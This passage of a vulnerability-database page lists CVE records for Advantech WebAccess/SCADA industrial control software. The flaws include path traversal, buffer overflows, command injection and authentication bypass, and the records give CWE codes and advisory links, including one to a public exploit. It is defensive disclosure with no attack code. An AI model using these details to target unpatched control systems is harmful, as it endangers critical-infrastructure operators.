https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.462Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "An Incorrect Privilege Assignment issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A built-in user account has been granted a sensitive privilege that may allow a user to elevate to administrative privileges." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-266", "description": "CWE-266", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12711", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Incorrect Privilege Assignment issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A built-in user account has been granted a sensitive privilege that may allow a user to elevate to administrative privileges." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-266" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12711", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.462Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-4525
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T00:32:25.717Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-06-21T00:00:00", "descriptions": [ { "lang": "en", "value": "Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-06-25T01:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-4525", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-4525", "datePublished": "2016-06-25T01:00:00", "dateReserved": "2016-05-05T00:00:00", "dateUpdated": "2024-08-06T00:32:25.717Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12717
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.462Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "An Uncontrolled Search Path Element issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A maliciously crafted dll file placed earlier in the search path may allow an attacker to execute code within the context of the application." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-427", "description": "CWE-427", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12717", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Uncontrolled Search Path Element issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A maliciously crafted dll file placed earlier in the search path may allow an attacker to execute code within the context of the application." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-427" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12717", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.462Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-7929
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/98311 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-124-03 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T16:19:29.504Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "98311", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/98311" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-124-03" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-05-05T00:00:00", "descriptions": [ { "lang": "en", "value": "An Absolute Path Traversal issue was discovered in Advantech WebAccess Version 8.1 and prior. The absolute path traversal vulnerability has been identified, which may allow an attacker to traverse the file system to access restricted files or directories." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-36", "description": "CWE-36", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-05-08T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "98311", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/98311" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-124-03" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-7929", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Absolute Path Traversal issue was discovered in Advantech WebAccess Version 8.1 and prior. The absolute path traversal vulnerability has been identified, which may allow an attacker to traverse the file system to access restricted files or directories." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-36" } ] } ] }, "references": { "reference_data": [ { "name": "98311", "refsource": "BID", "url": "http://www.securityfocus.com/bid/98311" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-124-03", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-124-03" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-7929", "datePublished": "2017-05-06T00:00:00", "dateReserved": "2017-04-18T00:00:00", "dateUpdated": "2024-08-05T16:19:29.504Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16720
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/44278/ | exploit, x_refsource_EXPLOIT-DB | |
http://www.securityfocus.com/bid/102424 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02 | x_refsource_MISC | |
https://www.tenable.com/security/research/tra-2018-23 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:20.912Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "44278", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/44278/" }, { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2018-23" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-05T00:00:00", "descriptions": [ { "lang": "en", "value": "A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "CWE-22", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-09-12T15:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "44278", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/44278/" }, { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2018-23" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16720", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-22" } ] } ] }, "references": { "reference_data": [ { "name": "44278", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/44278/" }, { "name": "102424", "refsource": "BID", "url": "http://www.securityfocus.com/bid/102424" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "name": "https://www.tenable.com/security/research/tra-2018-23", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2018-23" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16720", "datePublished": "2018-01-05T08:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:20.912Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3951
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-52 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess/SCADA |
Version: 8.4.2. |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.479Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-52" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess/SCADA", "vendor": "n/a", "versions": [ { "status": "affected", "version": "8.4.2." } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess before 8.4.3 allows unauthenticated remote attackers to execute arbitrary code or cause a denial of service (memory corruption) due to a stack-based buffer overflow when handling IOCTL 70533 RPC messages." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "CWE-121 Stack buffer overflow to code execution.", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-12-12T20:32:10", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2019-52" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3951", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess/SCADA", "version": { "version_data": [ { "version_value": "8.4.2." } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess before 8.4.3 allows unauthenticated remote attackers to execute arbitrary code or cause a denial of service (memory corruption) due to a stack-based buffer overflow when handling IOCTL 70533 RPC messages." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-121 Stack buffer overflow to code execution." } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-52", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-52" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3951", "datePublished": "2019-12-12T20:32:10", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.479Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12708
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.601Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "An Improper Restriction Of Operations Within The Bounds Of A Memory Buffer issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities that allow invalid locations to be referenced for the memory buffer, which may allow an attacker to execute arbitrary code or cause the system to crash." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12708", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Improper Restriction Of Operations Within The Bounds Of A Memory Buffer issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities that allow invalid locations to be referenced for the memory buffer, which may allow an attacker to execute arbitrary code or cause the system to crash." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-119" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12708", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.601Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-13552
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-260-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T23:57:39.182Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "versions 8.4.1 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "In WebAccess versions 8.4.1 and prior, multiple command injection vulnerabilities are caused by a lack of proper validation of user-supplied data and may allow arbitrary file deletion and remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-77", "description": "COMMAND INJECTION CWE-77", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-09-18T21:00:12", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-13552", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "versions 8.4.1 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess versions 8.4.1 and prior, multiple command injection vulnerabilities are caused by a lack of proper validation of user-supplied data and may allow arbitrary file deletion and remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "COMMAND INJECTION CWE-77" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-13552", "datePublished": "2019-09-18T21:00:12", "dateReserved": "2019-07-11T00:00:00", "dateUpdated": "2024-08-04T23:57:39.182Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16724
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/102424 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:20.312Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-05T00:00:00", "descriptions": [ { "lang": "en", "value": "A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-01-06T10:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16724", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "102424", "refsource": "BID", "url": "http://www.securityfocus.com/bid/102424" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16724", "datePublished": "2018-01-05T08:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:20.312Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12698
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.460Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "An Improper Authentication issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Specially crafted requests allow a possible authentication bypass that could allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-287", "description": "CWE-287", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12698", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Improper Authentication issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Specially crafted requests allow a possible authentication bypass that could allow remote code execution." } 